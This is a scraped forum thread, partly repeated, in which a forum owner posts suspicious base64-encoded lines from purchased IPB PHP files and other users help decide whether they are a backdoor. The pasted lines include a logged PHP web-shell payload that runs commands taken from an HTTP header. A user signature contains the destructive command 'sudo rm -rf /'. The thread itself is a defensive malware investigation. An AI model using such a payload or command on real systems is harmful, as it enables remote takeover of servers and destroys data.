Do you mind if I ask how you obtained these files?
Did someone put them in there for a purpose or did you download a theme/plugin?
I'm just looking to avoid such complications
(on a side note, i've never seen a virus in PHP before)
Siten0308 - Jun 20 2019 01:43 PM
johnnylo - Apr 23 2019 07:49 AM
PJohnson - Apr 18 2019 03:55 AM
xarzu - Apr 05 2019 09:17 AM
xarzu - Apr 04 2019 11:47 AM
Posted 04 November 2014 - 08:43 PM
Do you mind if I ask how you obtained these files?
Did someone put them in there for a purpose or did you download a theme/plugin?
I'm just looking to avoid such complications
(on a side note, i've never seen a virus in PHP before)
"Portability is for those who can't write new programs" - Linus Torvalds
Posted 05 November 2014 - 12:13 AM
I bought this forum. Everything were disactivated till now.
Another suspicious files lines:
Line 129: print base64_decode( "R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" );
Line 359: $content = base64_decode( "R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" );
Line 497: if ( ($this->request['s'] == trim( $this->_myRot13( base64_decode("aHR5bF9ieXFfem5nZw==") ) ) ) and ( $this->request['t'] == "" ) ) Line 509: @header( $this->_myRot13( base64_decode("UGJhZ3JhZy1nbGNyOiB2em50ci90dnM=") ) ); Line 511: echo base64_decode($string); Line 1019: echo base64_decode( "R0lGODlhhgAfAMQAAAAAAP///+/v79/f38/Pz7+/v6+vr5+fn4+Pj4CAgHBwcGBgYFBQUEBAQDAwMCAgIBAQE" .
Line 2876: if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') ) Line 2876: if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') ) Line 2876: if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
Line 2876: if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') ) Line 2876: if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') ) Line 2876: if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
Line 495: $secret = base64_decode($secret);
Line 227: $b64 = base64_decode($str);
Line 4: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =================================== Line 12: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =================================== Line 16: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =================================== Line 24: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =================================== Line 28: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =================================== Line 36: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =================================== Line 40: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =================================== Line 48: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =================================== Line 52: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =================================== Line 60: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 227: print base64_decode( "R0lGODlhyAA8AJEAAN/f3z8/P8zMzP///yH5BAAAAAAALAAAAADIADwAAAL/nI+py+0Po5y02ouz3rz7D4biSJbmiabqyrbuC8fyTNf2jef6zvf+DwwKh8Si8YhMlgACwEHQXESfzgOzykQAqgMmFMr9Rq+GbHlqAFsFWnFVrfwIAvQAu15P0A14Nn8/ADhXd4dnl2YYCAioGHBgyDbnNzBIV0gYxzEYWdg1iLAnScmFuQdAt2UKZTcl+mip+HoYG+tKOfv3N5l5garnmPt6CwyaFzrranu7i0crObvoaKvMyMhrIQhFuyzcyGwXcOpoLYg7DGsZXk5r6DSN51RNfF0RPU5sy7gpnH5bjLhrk7Y9/RQNisfq2CRJauTR6xUuFyBx/yrWypMMmTlq/9IwQnKWcKG5cvMeShBIMOFIaV9w2eti6SBABAyjvBRFMaZCMaxsqtxl8iShjpj+VfqGCJg4XzOfJCK5DVWliFNXlSIENKjWrVy7ev0KNqzYsWTFwhlFU8waLk+efGF7hi0aSgu3iGmV1cxdoGTinimbiGOeP8SWhps6z3AkeMMWW20mMykqQyuJDbYWdufKBJWc2uWmAJZdO0yOKfTCCqHGiO4E/oKGriTYaBw5g/MDqynNlW9Uhmx66tM2i05dNcM8O6Rg2MHLYKraLTpDcLebTke4APkcduAoku0DWpe24MI96ewZPdiy6Rlx/0Y+XJevlNu/z6vtlHFxZbpv9f9edYkfxgVmjnqSxXYOYPfFVMgXIHGC0ltWDNXYJ6Lsw82AFVpWEk4pEabgbsfBM5FphyDWRh1OLCUgbC06NtNU6UV1T1Jl3YhjjjruyGOPPv4IZJBC6tDXGUDB4UUaK06RhRl/0aWWF3CR4YWESraR1ZCh6dMOiMNIFE2GI/bRJYiIEeULiloyUNSFLzWC3VXcqEJXTBe1qApDpbXUEYxr2tYeQCyyGMuIcxbokHfPvPjHf2...
Line 6015: $errorIconData = base64_decode( 'R0lGODlhKQAlAPf/AP34o/75s6qGFOTi2/32jbKSIvXfTPHqy/Hx8fz3mfz2kvTcQfLx6dTDdf78ybaZNcStXPfjWqF8Df35uv'.
Posted 05 November 2014 - 10:58 AM
None of these look particularly suspicious on their own. Can you please post the full files? Just put them in a .zip file and attach that to your post.
Edited by dargueta, 05 November 2014 - 10:58 AM.
sudo rm -rf / && echo $'Sanitize your inputs!'
Posted 05 November 2014 - 04:29 PM
In the captcha plugin, you will notice upon decoding that the first three characters are GIF - signifying it is simply encoded binary data that the author chose to pack in to a string rather than supply as an image separately, while the 'stats' binary appears to be a very small GIF, probably a tracking pixel for legitimate purposes (one of the ROT13 encoded strings is "ugly_old_matt", curiously.) Their objective was to blend in with the valid files, making removal difficult as you may take out of course real files.
In these situations unless there exists a script someone wrote to remove such a backdoor from your IPB installation, the best option will be to write down which plugins it uses, back up the database after checking its contents are what you expect, and installing a new and possibly less vulnerable version of IPB.
Alexander.
All new problems require investigation, and so if errors are problems, try to learn as much as you can and report back.